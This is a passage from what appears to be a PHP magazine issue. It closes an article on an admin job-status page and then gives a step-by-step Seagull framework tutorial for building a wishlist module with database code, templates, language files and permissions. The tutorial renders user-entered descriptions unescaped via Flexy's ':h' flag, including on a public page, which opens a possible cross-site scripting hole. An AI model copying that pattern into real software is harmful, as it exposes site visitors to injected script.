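               . ' height="10" width="1" style="visibility: hidden" alt="' . $color . '">';
    }
    return $html . '</nobr>';
}
```

The status page would echo buildStatusImages($row['job_id']) inside the cell reserved for the bar, and the JavaScript would later make the images visible and resize them.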
One-stop Editing

In the example script, we build the page, then hide the editable fields for each job. When you click on the “Edit” link, the CSS of a table cell is set from “display: none” to “display: inline”. This displays the cell and allows editing. While this more than doubles the size of the HTML served out to the admin, everything is available for editing and it all comes from the same dataset that is used to display static information. Also, by editing and/or hiding import job information, it allows the admin user to have second thoughts without departing from the general status page. In other words, he can get status updates while he’s preparing an import job. This sort of functionality is becoming more common every day; for example, Blogger’s post editing table of contents contains a similar mechanism.
JavaScript Generation Page

The part of this system that gives the page the most flash is the JavaScript. The code itself is very easy to pull off. You run a SELECT query on the job_status table to produce rows of data. The data from those rows are output as arguments for a number of parent.UpdateStatus() statements, one for each row. The resulting calls are bundled into a SendStatusUpdates() function that is executed by the HTML body’s onLoad event (see Listing 6). When this page is loaded into the iframe, it calls UpdateStatus() in the parent page (the main status page). One thing to note: because of XSS (cross-site scripting) risks, parent pages and their child frames can only communicate with one another if they are of the same domain.

This page is regenerated via a meta-tag refresh. How often this happens is at your discretion. Each refresh will incur a small amount of server load. In my example, the meta-tag refreshes roughly every 30 seconds. My code considers the number of rows it will update, counting them in $timing (incremented with $timing++ for each row). After creating the parent.UpdateStatus(...) statements, it uses $timing = max(2,(10 - ($timing * 2))); to derive a value between 2 and 10, and it uses that as the refresh interval (in seconds).
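A stripped-down version of such a generation page could be sketched like this. It is not Listing 6: buildStatusFrame() and refreshInterval() are hypothetical names, the rows are passed in as arrays rather than fetched from the database, and the argument order given to parent.UpdateStatus() is an assumption. The interval formula is the one quoted above, which gives 10 seconds when no rows need updating and bottoms out at 2 seconds from four rows upward.

```php
<?php
// Refresh interval in seconds, using the formula quoted in the article.
function refreshInterval($rowCount)
{
    return max(2, 10 - ($rowCount * 2));
}

// Builds the hidden iframe document from job_status rows.
// The argument order passed to parent.UpdateStatus() is an assumption.
function buildStatusFrame(array $rows)
{
    $calls = '';
    $timing = 0;
    foreach ($rows as $row) {
        $calls .= sprintf(
            "    parent.UpdateStatus(%d, %d, %d, %d, %d);\n",
            $row['job_id'],
            $row['Status_Green'],
            $row['Status_Yellow'],
            $row['Status_Red'],
            $row['Total_Processed']
        );
        $timing++; // one more row that needed an update
    }
    $seconds = refreshInterval($timing);

    return "<html><head>\n"
         . '<meta http-equiv="refresh" content="' . $seconds . '">' . "\n"
         . "<script type=\"text/javascript\">\n"
         . "function SendStatusUpdates() {\n" . $calls . "}\n"
         . "</script>\n"
         . "</head><body onload=\"SendStatusUpdates()\"></body></html>\n";
}
```

Because every value goes through %d, nothing from the database can break out of the generated JavaScript; string arguments would need escaping before being written into the page.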
The Log Viewer

If you have chosen to build this tool with the logging functionality, include the code for the log (Listing 7). From the admin/display page, include a link to “View Log”. This will spawn a new page that contains the relevant log entries. The log viewer generates a list of log entries that match the job_id that was passed to the log viewer as a variable in the query string. This log is intentionally brief and simple so that the script can be tweaked out in any direction. Rather than display and hide a table of editing material, this space could hold an iframe of content or a Flash movie, or both.
Conclusion

Jobs can be set up to run at a particular time of day. When the cron job and the time value for a job coincide, that can trigger the job. Once the job has been processed, time and cron job may coincide again, but the status will have changed and so the job would not run again. Aborting an operation that is currently underway is not a good idea, but such functionality could be added. If the application works with a database capable of committing transactions, blocks of operations could be rolled back when a process is aborted. This tool can be used to encapsulate large admin tools and lengthy jobs, or to put a layer of protection between the client and applications in use.
MIKE DeWOLFE is a developer for the international aid organization the Communications Initiative (http://www.comminit.com/). He can be contacted via http://mike.dewolfe.bc.ca/ (you’ll have to forgive him for hosting his site on a Microsoft platform).
FEATURE

Flying with Seagull

Last month we gave you an introduction to Seagull. We continue this month with a step-by-step guide for setting up an example website. Two to three years of PHP experience and familiarity with object-oriented programming are recommended.

by WILLIAM ZELLER and WERNER M. KRAUSS
A web framework is a necessity when developing a serious website. Programmers should not recreate basic web elements when great tools to help them get the job done already exist. One of these tools, Ruby on Rails, garnered much attention when it was released in July 2004. It simplified Ruby development, separated data from display, and made web development fun. In the last issue, and Part 1 of this article, we introduced the Seagull Framework and covered its basics. This month, we’ll walk through a practical example of how to deploy these new skills.
PHP: 4.1, better 4.3, also works with 5
OTHER SOFTWARE: Database: MySQL, PostgreSQL and Oracle are supported, but theoretically all databases supported by PEAR::DB (e.g. MSSQL, SQLite or ODBC) can be used without problems
LINKS: http://seagull.phpkitchen.com http://seagull.phpkitchen.com/apidocs/ http://pear.php.net/package/HTML_Template_Flexy
CODE DIRECTORY: seagull2
TO DISCUSS THIS ARTICLE VISIT: http://forum.phparch.com/265

Creating an Example Module

To demonstrate how to extend Seagull, we’re going to give a detailed example of creating a custom module. The module we’ve chosen is a “wish list” module. A user will be able to sign up and add/edit/delete items from his wish lists. Guests will be able to view the contents of a user’s wishlist and notify the system if they’ve bought an item on the list. This example covers the basics of module creation and, we hope, will be an enjoyable site to create.

But first, one more piece of theory: Seagull provides a validate/process/display workflow, which simply means that all data that passes through the system must be filtered by the following methods:

• validate: The raw $_REQUEST is passed in to this method, validations are performed, and acceptable data is mapped to an $input object.
• process: If all data is valid, the $input object is passed to the process method, which redirects to the relevant action method. Once data has been manipulated, it is mapped to an $output object. If one or more validations have failed, all data is deemed to be invalid, and is passed directly to the display() method with appropriate error messages. This will most likely be presented back to the user for correction.
• display: This takes the data, whether valid or invalid, adds a few system properties like execution time, etc., and sends it to the template engine for rendering into HTML.

The first step in creating the wish list module is to create the table in our database to store users’ wish lists. The SQL for this can be found in Listing 0. Go to Modules->Maintenance, click “Rebuild Dataobjects Now.” This will create a file in [path-to-seagull]/var/cache/entities/ called Wishlist.php.

Now we need to create our module. You can either choose a module that is similar to your needs and modify it, or begin with a new one. In the former case, just copy the old module files and directories and rename them as needed. In the latter, you can either start from scratch or use the “Module Skeleton Generator.” This functionality is not meant for creating the complete module (that is not yet possible), but it creates the basic structure using a simple form, including directories for classes, translations and templates, and some basic files for your new module. Go to the “Create a module” section of the Modules->Maintenance tab and select all the checkboxes except Create Templates (check add, edit, insert, ini file, etc). Enter Wishlist for the module name and WishlistMgr for the manager name. You will need to make sure the [path-to-seagull]/modules/ directory is writable.
If these steps were performed successfully, you will now have the following files:

    /seagull/modules/wishlist/conf.ini
    /seagull/modules/wishlist/classes/WishlistMgr.php

and an empty directory:

    /seagull/modules/wishlist/lang/
Open /seagull/modules/wishlist/classes/WishlistMgr.php and you will see the contents of Listing 1.
LISTING 0

    CREATE TABLE `wishlist` (
        `wishlist_id` int(11) unsigned NOT NULL auto_increment,
        `uid` int(11) unsigned NOT NULL default '0',
        `name` varchar(50) NOT NULL default '',
        `url` varchar(255) NOT NULL default '',
        `description` mediumtext NOT NULL,
        `cost` float NOT NULL default '0',
        `priority` tinyint(1) NOT NULL default '0',
        `bought` tinyint(1) NOT NULL default '0',
        PRIMARY KEY (`wishlist_id`)
    ) TYPE=MyISAM;
First, take a look at the WishlistMgr() method (the constructor of the WishlistMgr class). Notice the line:

    SGL::logMessage(null, PEAR_LOG_DEBUG);

This line is in every method of Seagull modules, allowing Seagull to record intelligent error messages in the log placed in [path-to-seagull]/var/log/. The next three lines set the default values for the module. If no action is specified, the title of the page will be “Wishlist Manager” and will use the template “WishlistList.html”. The _aActionsMapping variable is the most interesting part of the constructor. It’s an associative array which maps actions to their respective methods. For example, the following line tells Seagull that the action “add” should call the method “_add()”.

    'add' => array('add')

This is an extra level of security that ensures Seagull doesn’t assume every method in the class is a callable action. The second element of the array is optional, and tells Seagull to redirect to a page after performing some action. So the following line calls the _delete() method, then redirects to the special action “redirectToDefault” (which happens to be “list”).

    'delete' => array('delete', 'redirectToDefault'),

If one wanted to redirect to the add action after deletion, one would simply change that line to:

    'delete' => array('delete', 'add'),

Using this system, you can add as many actions as you want to Seagull. Let’s move on to the validate() method. It begins by setting $this->validated to true. If we find errors during validation, this will be set to false and Seagull will know to stay where we are and display an error message. The next few lines set $input values to their defaults.

    $input->action = ($req->get('action')) ? $req->get('action') : 'list';

The above line says “If there’s an action, use that action. If not, use list.” This line is what makes list the default action for the module. The if statement in validate() checks to see if errors have occurred. If they have, it creates a warning message and tells Seagull that the data is invalid. The action methods (_add(), _insert(), _edit(), etc) are currently stubs and ready for our own wishlist code.
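To see why the mapping acts as a gatekeeper, it can help to look at a toy dispatcher. The class below is emphatically not Seagull’s manager base class, and its dispatch() method is invented for this sketch; it only mimics the ideas described above: actions are looked up in the mapping, each mapped name is run as an underscore-prefixed method, “redirectToDefault” leads to “list”, and anything not in the mapping falls back to the default action (that last behaviour is an assumption of the sketch).

```php
<?php
// A toy manager, NOT Seagull's real base class: it only mimics the
// idea of mapping action names to underscore-prefixed methods.
class ToyWishlistMgr
{
    public $log = array();
    public $_aActionsMapping = array(
        'add'    => array('add'),
        'delete' => array('delete', 'redirectToDefault'),
        'list'   => array('list'),
    );

    public function dispatch($action)
    {
        // Unknown or missing actions fall back to the default, 'list'.
        if (!isset($this->_aActionsMapping[$action])) {
            $action = 'list';
        }
        foreach ($this->_aActionsMapping[$action] as $step) {
            if ($step === 'redirectToDefault') {
                $step = 'list';
            }
            $method = '_' . $step;
            $this->$method();
        }
        return $this->log;
    }

    public function _add()    { $this->log[] = 'add'; }
    public function _delete() { $this->log[] = 'delete'; }
    public function _list()   { $this->log[] = 'list'; }

    // Not listed in the mapping, so no request can reach it by name.
    public function _purge()  { $this->log[] = 'purge'; }
}
```

Dispatching “delete” runs _delete() and then _list(), while a request for “purge” quietly ends up at the list, because only names present in the mapping are ever turned into method calls.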
Listing Items on the Wishlist

First, let’s create the wishlist listing. This is an editable list of every item on a user’s wishlist. In the _list() method, we’ll grab the necessary data to list items on the wishlist. Then we’ll create a listing template and tell it how to access the data we’ve accumulated. We’ll need the Wishlist class that Seagull created for us, so at the top of the WishlistMgr.php file, put the following line.

    require_once SGL_ENT_DIR . '/Wishlist.php';
Then we use the _list() method from Listing 2. On line 5, we create a new DataObjects_Wishlist object, using the class created for us by Seagull. On line 6, we set the wishlist’s uid (user id) to the uid of the currently logged in user. This ensures that only the user’s wish list items are listed on this page. On line 7, we call the find() method, which finds all rows in the database matching the current wishlist object. In this case, that means searching for all wishlist items where the uid matches the current user’s uid. On line 8, we create a new array to hold the wishlist items. On line 9, we check to see that we have at least one wishlist item, and on lines 10 through 14, we use a while statement to loop over the results of the query. We add each result to our items array, cloning the object to ensure data isn’t lost when $wishlist->fetch() is called again. Lastly, on line 16, we make the items array accessible from our template.

The data acquisition of the wishlist listing is complete, but we haven’t specified how we want that data displayed. To do that, we need to create a template. Save Listing 3 to [path-to-seagull]/www/themes/default/wishlist/WishlistList.html.

In Flexy, the template system used by Seagull, variables can be accessed as {var}. Similarly, functions can be accessed by calling {foo()}. On line 4 of Listing 3, the translate() function is called with the pageTitle argument. We can access the pageTitle variable because we set $input->pageTitle in the validate() method. $input is mapped to $output (see the validate/process/display explanation above for the reason why). The translate function takes a string argument, which it translates in the template using the files in our [path-to-seagull]/modules/wishlist/lang directory. It can take either another variable or text itself. To translate text, the {translate(#text to translate#)} syntax needs to be used. This is done on lines 18-24 to print the table headers.

Note that the translate() function in the templates is only used for GUI information, not content. Line 5 contains {msgGet()}, which leaves space for any error or status messages we may need to print. Next, we have a simple table; after the headers is a foreach statement. It is terminated with an {end:} statement. The lines

    {foreach:items,key,item}
    ...
    {item.name}
    ...
    {end:}

are equivalent to the following PHP code:

    foreach ($items as $key => $item) {
        echo $item->name;
    }

Next, we call the switchRowClass() function, which alternates colors for our table rows. Then, we simply output the variables in the table and finally provide the ability to delete multiple items.
Language Files

Every Seagull module contains one or more language files. The language file is stored in the [path-to-seagull]/modules/[module]/lang/ directory, and the default language file is english-iso-8859-15.php. This is a PHP file which contains an associative array that maps words and phrases to their English translations. For our wishlist module, the language file will look like Listing 16. Put Listing 16 in a file named english-iso-8859-15.php and store that file in the [path-to-seagull]/modules/wishlist/lang/ directory.

When the translate() method is called with an argument, Seagull looks to see if the argument exists as a key in the $words array. If it exists, the value of that element is used in the template. If the key cannot be found, the key is printed surrounded by “>” and “<”. This is an indication that any text between “>” and “<” should be added to the language file.
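The lookup rule is simple enough to sketch in plain PHP. translateWord() below is a simplified stand-in written for illustration, not Seagull’s translate() implementation, and the two entries in $words are made-up examples rather than the contents of Listing 16.

```php
<?php
// Simplified stand-in for the lookup described above; the function name
// and signature are illustrative, not Seagull's API.
function translateWord($key, array $words)
{
    if (isset($words[$key])) {
        return $words[$key];
    }
    // Missing keys are flagged so they are easy to spot on the page.
    return '>' . $key . '<';
}

// Example entries only; a real language file holds the module's strings.
$words = array(
    'Wishlist Manager' => 'Wishlist Manager',
    'Name'             => 'Name',
);
```

With this array, translateWord('Name', $words) returns the translation, while translateWord('Cost', $words) comes back wrapped in the markers, which is the cue to add a “Cost” entry to the language file.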
Configuration Files
Each module contains a configuration file called conf.ini, which lives in the [path-to-seagull]/modules/[module]/ directory. This is an ini file which contains module-specific options determined by the module developer. These options can be easily changed without digging through code. They can be accessed by the module using:

$conf = & $GLOBALS['_SGL']['CONF'];

This puts every module’s configuration in the $conf variable. By default, the wishlist conf.ini file contains the WishlistMgr section with the requiresAuth option. This can be accessed with the following, for example:

if ($conf['wishlistmgr']['requiresAuth']) // ...

Note that every manager class of your module needs its own section in this conf.ini file, otherwise Seagull will throw an error.
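To see how an ini section turns into a nested array, here is a small sketch using PHP’s own parse_ini_string(). The ini text is a hypothetical fragment, and Seagull’s loader may treat key case differently (the article reads the section as 'wishlistmgr'), so take this as an illustration of the data shape only.

```php
<?php
// Hypothetical conf.ini contents; only the section and option names
// come from the article.
$ini = "[WishlistMgr]\nrequiresAuth = true\n";

// With the second argument set to true, each [section] becomes its own
// sub-array. In the default scanner mode, "true" is returned as "1".
$conf = parse_ini_string($ini, true);

if ($conf['WishlistMgr']['requiresAuth']) {
    echo "WishlistMgr requires authentication\n";
}
```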
Registering the Wishlist Module
Seagull provides a module management system where we can view and edit all the modules in our Seagull installation. In order for Seagull to know that we’ve added a new module, we need to add it to the system. To add our wishlist module, go to Modules -> Manage and hit the Add a module button. Fill out the form with name (“wishlist”), title (“A simple wishlist manager”), configurable (“yes”), description (this text will be used in the Module Manager to describe this module), the admin URI and an icon filename. If you don’t have an icon for your module yet, just use an existing icon like faqs.png. After clicking the Add button, we see the Module Manager screen again. You will see the wishlist manager at the end of the list of modules. Clicking on this listing leads us to the admin section of our wishlist module.
Linking to the Wishlist
Seagull’s URLs take the form of http://seagull-example.com/index.php/module/action/. The URL for our Wishlist module would be /index.php/wishlist/.

You can type that into your browser each time you want to view the page, but we can create a navigational link to make it easier (and to let a user know where he can find his wishlist). To create a link, go to Modules->Navigation->New Page. Enter “Wishlist Manager” as the title and make the parent page “Top Level”. Select “dynamic pages” next to page and a list of modules will appear. Click the “wishlist” module. Then go to “check to activate” and under “can view,” select the roles “root” and “member” (you can select multiple items by holding down control when selecting). A link will be displayed at the top of your screen. You can change its position by clicking the up and down arrows on the page manager screen, which is where you are redirected after adding a new page. Clicking on “Wishlist Manager” should display this table. We haven’t added any items yet, so it will be empty and quite boring. Let’s spruce things up a bit by adding some items to our wishlist. Figure 1 shows an example wishlist.
Listing 7

function validate($req, &$input)
{
    SGL::logMessage(null, PEAR_LOG_DEBUG);
    $this->validated = true;
    $input->error = array();
    $input->pageTitle = $this->pageTitle;
    $input->masterTemplate = $this->masterTemplate;
    $input->template = $this->template;
    $input->action = ($req->get('action')) ? $req->get('action') : 'list';
    $input->aDelete = $req->get('frmDelete');
    $input->submit = $req->get('submitted');
    $input->item = (object)$req->get('item');
    $input->wishlist_id = $req->get('wishlist_id');

    // only validate when the form has been submitted
    if ($req->get('submitted')) {
        if (empty($input->item->name))
            $aErrors['name'] = 'Please enter a name for this item';
        if (empty($input->item->description))
            $aErrors['description'] = 'Please enter a description for this item';
        // elseif keeps the "empty" message from being overwritten
        if (empty($input->item->cost))
            $aErrors['cost'] = 'Please enter a cost for this item';
        elseif (!is_numeric($input->item->cost))
            $aErrors['cost'] = 'Please enter the cost as a number';
    }

    // if errors have occurred
    if (isset($aErrors) && count($aErrors)) {
        SGL::raiseMsg('Please fill in the indicated fields');
        $input->error = $aErrors;
        $this->validated = false;
        $input->template = 'WishlistEdit.html';
        if ($input->action == 'insert')
            $input->pageTitle = 'Wishlist Manager :: Add';
        if ($input->action == 'update')
            $input->pageTitle = 'Wishlist Manager :: Edit';
        $input->priorities = SGL_String::translate('priorities');
    }
}

Listing 9

function _update(&$input, &$output)
{
    SGL::logMessage(null, PEAR_LOG_DEBUG);
    $wishlist = & new DataObjects_Wishlist();
    $wishlist->uid = SGL_HTTP_Session::getUid();
    $wishlist->get($input->item->wishlist_id);
    $wishlist->setFrom($input->item);
    $success = $wishlist->update();
    // update() returns false on failure; 0 affected rows is not an error
    if ($success !== FALSE) {
        SGL::raiseMsg('Wishlist item saved successfully');
    } else {
        SGL::raiseError(
            'There was a problem saving the wishlist item',
            SGL_ERROR_NOAFFECTEDROWS
        );
    }
}

Adding Wishlist Items
Figure 2 shows the add page. To add items, we’ll need to create a new action called add, not surprisingly. In Listing 3, we created a link to the action on line 13, but clicking on it will do nothing because we haven’t created an add action yet. We’re going to do that now. Listing 4 shows the add method. Line 4 sets the page title, line 5 sets the template file, and line 6 sets the action. We’re setting the action here and not in the template because we’re going to use the same template for both adding and editing items. Line 7 populates the select box with available priorities, which are retrieved from the language file.

Now let’s take a look at the template for the add action. Save Listing 5 to /seagull/www/themes/default/wishlist/WishlistEdit.html. This code begins by checking to see if a wishlist_id exists (if it does, this means we’re editing an existing wishlist item, otherwise we’re creating a new one). Next, we leave room for the title of the page and error messages. A table is then created and a row given for each input element. Above each element we have a flexy:if statement inside a tag. So this tag is only displayed if an error exists for this element. The rest of the template is a simple form for inputting the data we need for the wishlist item.

We now have a page that allows a user to enter a new item into our wish list, but we haven’t added any code to actually insert the item into the database. So, let’s modify the validate() and insert() methods to do this for us. In validate(), add the following line after the line containing $input->submit = ...:

$input->item = (object)$req->get('item');
This takes the values in our form (item[name], item[url], etc.) and creates an object (item->name, item->url, etc.). Replace the _insert() method in the WishlistMgr class with the code in Listing 6. Here, we create a new Wishlist object, then copy the values from $input->item using the setFrom() function. Then, we simply set the user’s id (uid) and call $wishlist->insert(), which inserts the new wishlist item into the database. This is one of the best examples of why Seagull is such a joy to use. There’s no need to handle user input ourselves or even to write our own SQL. In three lines of code we can populate an object with user submitted values and insert a new row into the database. If you can become accustomed to this new way of doing things now, it will save you a huge amount of time when developing websites in the future.

Volume 4 Issue 11 • php|architect • 38
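The array-to-object cast used in validate() is plain PHP and can be tried on its own. In this sketch the $request array is a hypothetical stand-in for what $req->get('item') would return after a form with item[name], item[url] and item[cost] fields is submitted.

```php
<?php
// Hypothetical form submission: fields named item[name], item[url], ...
// arrive in PHP as a nested array.
$request = array(
    'item' => array(
        'name' => 'McLaren F1',
        'url'  => 'http://example.com/f1',
        'cost' => '970000',
    ),
);

// Casting the array to an object turns each key into a property.
$item = (object) $request['item'];

echo $item->name, "\n";
echo $item->cost, "\n";
```

The result is a stdClass instance, which is why the listings can read $input->item->name instead of $input->item['name'].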
Handling User Input
To demonstrate Seagull’s error handling features, let’s add some validation to this input by changing the validate() method to the code found in Listing 7. First, we check to see if the “submitted” variable has been set (this is set in the add template). If so, we do various checks on the data. We make sure the values aren’t empty and ensure the cost is a numeric value. If there are any errors, we set the appropriate value in the $aErrors array. We add code in the if statement to tell Seagull to return to the appropriate page and display errors based on the current action.

Editing Wishlist Items
Now we can add wishlist items, but what happens when we decide that not only do we want a new McLaren F1, but we must have one, and want to change the item’s priority? We need to be able to edit wishlist items, which we can do by creating an edit action. Listing 8 shows the edit() method. We set the page name, template and action. Next we use the find() method to search for all wishlist items with the wishlist_id that was submitted, and the uid of the current user (we wouldn’t want someone to edit someone else’s wishlist!). The find() method takes an optional argument called autoFetch which populates the wishlist object with the first row it finds. No more than one row can be returned in this case because we’re searching with wishlist_id, which is a primary key (and therefore unique).

Next, let’s create an update action in order to save the changes we’re making to wishlist items. Replace the current update() method with Listing 9. It’s almost identical to the insert() method, except that we retrieve the item from the database to ensure that the user has the authority to edit it and also to populate it with existing values that we’re not editing (such as whether or not the item has been bought). update() returns the number of affected rows when successful and a boolean false when unsuccessful. Therefore, we must check $success !== FALSE to ensure we’re not interpreting 0 as FALSE.
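The difference between the strict and the loose comparison is easy to demonstrate without a database. In this sketch, updateSucceeded() is a hypothetical helper and $result simply stands for whatever update() returned.

```php
<?php
// Sketch: $result stands for the return value of update(), i.e. the
// number of affected rows, or false on failure (as described above).
function updateSucceeded($result)
{
    // Strict comparison: 0 affected rows still counts as success.
    return $result !== false;
}

var_dump(updateSucceeded(1));     // a row changed
var_dump(updateSucceeded(0));     // nothing changed, but no error either
var_dump(updateSucceeded(false)); // the update failed
var_dump(0 == false);             // loose comparison cannot tell 0 from false
```

Saving a form without changing any value is the typical case where zero rows are affected, so a loose check would report a failure that never happened.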
[Figure 1: an example wishlist]
[Figure 2: the add page]
Deleting Wishlist Items
The last step of managing wishlist items is creating a delete action. The delete() method is shown in Listing 10. To delete items from the wishlist, we simply loop over the items submitted for deletion, retrieve each one from the database and call delete() on the wishlist object.

Let’s get some practice editing these actions we’ve created by cleaning things up a bit. As you add and edit wishlist items, you may notice that descriptions are only displayed on one line. We can fix this easily. Add the following line inside the while loop in the list() method:

$wishlist->description = nl2br($wishlist->description);

This converts all new lines in the description to HTML line breaks (the <br /> tag). Change {item.description} to {item.description:h} in WishlistList.html. Putting :h after any variable tells Flexy not to escape HTML tags.

The Priority and Bought fields are currently displayed as integers. This is readable but ugly. To beautify the Priority column, add this line after the call to SGL::logMessage in list():

$priorities = $this->getPrioritiesList();

In the same method, add the following line after $wishlist->description = ... in the while loop:

$wishlist->priority_str = $priorities[$wishlist->priority];

This replaces the priority with its string representation. To beautify the Bought column, change {item.bought} in WishlistList.html to this:

{if:item.bought} Bought {else:} Not Bought {end:}
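The three cosmetic changes above can be tried on a plain object. This is a sketch under assumptions: $row stands in for one fetched wishlist row, and the $priorities array mirrors the 'priorities' entry of the language file rather than calling getPrioritiesList().

```php
<?php
// Hypothetical priorities list, mirroring the 'priorities' entry
// of the language file.
$priorities = array(
    1 => 'Would love to have',
    2 => 'Would like to have',
    3 => 'Wouldn\'t mind having',
);

// A plain object standing in for one fetched wishlist row.
$row = new stdClass();
$row->description = "Fast.\nVery fast.";
$row->priority    = 1;
$row->bought      = 0;

// Newlines become <br /> tags; the integer priority gets a label.
$row->description  = nl2br($row->description);
$row->priority_str = $priorities[$row->priority];

// Same decision the {if:item.bought} template block makes.
$boughtLabel = $row->bought ? 'Bought' : 'Not Bought';

echo $row->description, "\n", $row->priority_str, "\n", $boughtLabel, "\n";
```

Note that nl2br() keeps the original newline and inserts the tag in front of it, which is why the template has to output the value unescaped with :h.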
Wishlist management is complete! Now we need to add a publicly viewable wishlist page.

The Public Wishlist Page
Figure 3 shows the public wishlist page. Let’s call this new action listPublic. We’ll need to create a new method as well as a new template page. We also need to tell Seagull that we want to use this new action. In the WishlistMgr() constructor, add the following after 'list' => array('list'):

'listPublic' => array('listPublic')

Next, add the method in Listing 11 to the WishlistMgr class. When a user puts his wishlist online, others need to know how to send the items on the list to the owner. In listPublic(), we have added code to create a user object and fill it with values based on the owner of the wishlist. We have done this by using the DataObjects_Usr class, which we can manipulate just like we manipulate the DataObjects_Wishlist class. We use this information to print out the user’s address information. To use the DataObjects_Usr class, you need to add the following line after require_once SGL_ENT_DIR . '/Wishlist.php'; at the top of your script:

require_once SGL_ENT_DIR . '/Usr.php';

You’ll also need to add

$input->uid = $req->get('uid');

after

$input->wishlist_id = $req->get('wishlist_id');

in the validate() method. Notice that the remaining code is very similar to the code in list(). The two main differences are that it only lists wishlist items that have not been bought and the items are ordered by priority. Save Listing 12 to [path-to-seagull]/www/themes/default/wishlist/WishlistListPublic.html.
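The two differences from list() (hide bought items, order by priority) can be illustrated on a plain array. This is only a sketch of the selection rule: Listing 11 presumably expresses it through the DataObject query, and publicItems() and the sample data are invented for the example.

```php
<?php
// Made-up wishlist rows for illustration.
$items = array(
    array('name' => 'Book',   'priority' => 2, 'bought' => 0),
    array('name' => 'Guitar', 'priority' => 1, 'bought' => 0),
    array('name' => 'Socks',  'priority' => 3, 'bought' => 1),
);

// Keep only items that have not been bought, ordered by priority.
function publicItems(array $items)
{
    $open = array_values(array_filter($items, function ($item) {
        return !$item['bought'];
    }));
    usort($open, function ($a, $b) {
        return $a['priority'] - $b['priority'];
    });
    return $open;
}

foreach (publicItems($items) as $item) {
    echo $item['priority'], ' ', $item['name'], "\n";
}
```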
We need a method that a user can trigger to indicate that they’ve bought an item on someone’s wishlist (we wouldn’t want the owner getting five copies of the same book). Let’s call this method hasBeenBought(). This method simply changes the bought value of a wishlist item to TRUE. Add this line after 'listPublic' => ... in the WishlistMgr() constructor:

'hasBeenBought' => array('hasBeenBought', 'listPublic')

Then, add the method in Listing 13 to the WishlistMgr class. The site is almost finished!
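The hasBeenBought entry lists two method names. Assuming each entry names a method that is run in order (so the public list is shown again after the item is marked), the idea can be sketched with a toy class. ToyWishlistMgr, its $actions property and run() are illustrative names only, not Seagull’s API.

```php
<?php
// Toy manager class; all names here are illustrative assumptions.
class ToyWishlistMgr
{
    public $log = array();

    // action name => methods to run, in order
    private $actions = array(
        'listPublic'    => array('listPublic'),
        'hasBeenBought' => array('hasBeenBought', 'listPublic'),
    );

    // Run every method mapped to the requested action, in sequence.
    public function run($action)
    {
        foreach ($this->actions[$action] as $method) {
            $this->$method();
        }
    }

    private function hasBeenBought()
    {
        $this->log[] = 'marked item as bought';
    }

    private function listPublic()
    {
        $this->log[] = 'rendered public list';
    }
}

$mgr = new ToyWishlistMgr();
$mgr->run('hasBeenBought');
print_r($mgr->log);
```

Chaining actions this way keeps hasBeenBought() small: it only changes the data and leaves the display to the method that already knows how to do it.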
Listing All Users’ Wishlists
Let’s add one more very simple page that links to each user’s wish list. Add the following line after 'hasBeenBought' => ... in the WishlistMgr() constructor:

'listUsers' => array('listUsers')

Add the method in Listing 14 to your WishlistMgr class. It simply iterates over every user, and both it and its template, which is similar to the others, should be easy to follow. Save Listing 15 to [path-to-seagull]/www/themes/default/wishlist/WishlistListUsers.html. Finally, let’s add a link to the list of users to the navigation bar. Go to Modules->Navigation->New Page, enter “Wishlists by User” as the title, click dynamic page, click wishlist and enter “action/listUsers” as the “Additional Params”. Click the “check to activate” button and give access to all users (guest, members and admin).
You now have a fully featured wishlist and should be able to take what you’ve learned from this tutorial and create your own sites quickly and easily with Seagull.
Wishlist Permissions
If a user other than root wants to see the wishlist, he gets the error “You do not have the required perms to perform this action”. What’s wrong? We have not added the new permissions for this module to the system. This is very easy to do: after selecting the manage permissions button from the User & Security module, we hit the detect and add button, select all permissions for our wishlist module and add them to the permission list with one more click. Now, we can add the new permissions to roles. For example, Guest will be given wishlistmgr_listPublic, so he can view all wishlist items. This will work after you log out or close the browser, because permissions are stored in a cookie which lasts the lifetime of the browser’s session. Members should also be able to add and update their own wishlists. But merely adding the permissions to the role doesn’t give existing users these rights. What’s wrong? Permissions are not retroactive, so we need to sync the current roles. This is as simple as clicking “sync perms with role”. You can select the users you want to sync, whether to sync them with their current role or another one, and whether to add missing permissions, delete extra permissions, or both. Using this tool can help you keep the rights management up to date.
Language file (english-iso-8859-15.php), final entries:

    'Cost' => 'Cost',
    'Bought' => 'Bought',
    'With selected items(s)' => 'With selected items(s)',
    'URL' => 'URL',
    'Add New Wishlist Item' => 'Add New Wishlist Item',
    'Wishlist item added successfully' => 'Wishlist item added successfully',
    'There was a problem adding the wishlist item' => 'There was a problem adding the wishlist item',
    'Wishlist item saved successfully' => 'Wishlist item saved successfully',
    'There was a problem saving the wishlist item' => 'There was a problem saving the wishlist item',
    'That user does not exist' => 'That user does not exist',
    'Wishlist item deleted successfully' => 'Wishlist item deleted successfully',
    'Please enter a name for this item' => 'Please enter a name for this item',
    'Please enter a description for this item' => 'Please enter a description for this item',
    'Please enter a cost for this item' => 'Please enter a cost for this item',
    'Please enter the cost as a number' => 'Please enter the cost as a number',
    'priorities' => array(
        1 => 'Would love to have',
        2 => 'Would like to have',
        3 => 'Wouldn\'t mind having'),
);
?>
Using Blocks
The Block module allows you to easily add content blocks to your site. Examples of some of the blocks shipped with Seagull are: site news, login, random messages or category navigation. You can reach the Block Manager via Manage Modules -> Blocks. New block types can be added by putting a file containing the new class into the modules/block/classes/blocks directory. When editing the block information, the Name parameter of the block corresponds to the PHP file you want to use for content rendering. If you want to, for example, add the login block delivered with the Seagull distribution, you have to activate it in the administration screen of the block module. You can edit the title of the block, the CSS class for displaying it, whether it’s shown on the left or right side and in which sections the block should appear. And, of course, you can edit the order of the blocks.

Let’s add a custom block for our new wishlist module. For this, we have to add a new block class to modules/block/classes/blocks/ as shown in Listing 16. Note that the class name must be the same as the file name, otherwise Seagull cannot instantiate the block. In the init() method, we just call two other methods: retrieveAll(), which gets the 5 most recent items from the database, and toHtml(), which formats the items nicely. Listing 17 contains these retrieveAll() and toHtml() methods. Copy these to your WishlistBlock.php file. Finally, we have to add our new block class through the Block Manager’s New Block form: fill in name (WishlistBlock) and title (Wishlist), which sections it should appear in, and its position. Then hit “submit” and the block details will be saved, but by default, the block will not be active. So, we hit edit again and check the activated checkbox. Now, you will see the new block.
Modifying the Look and Feel
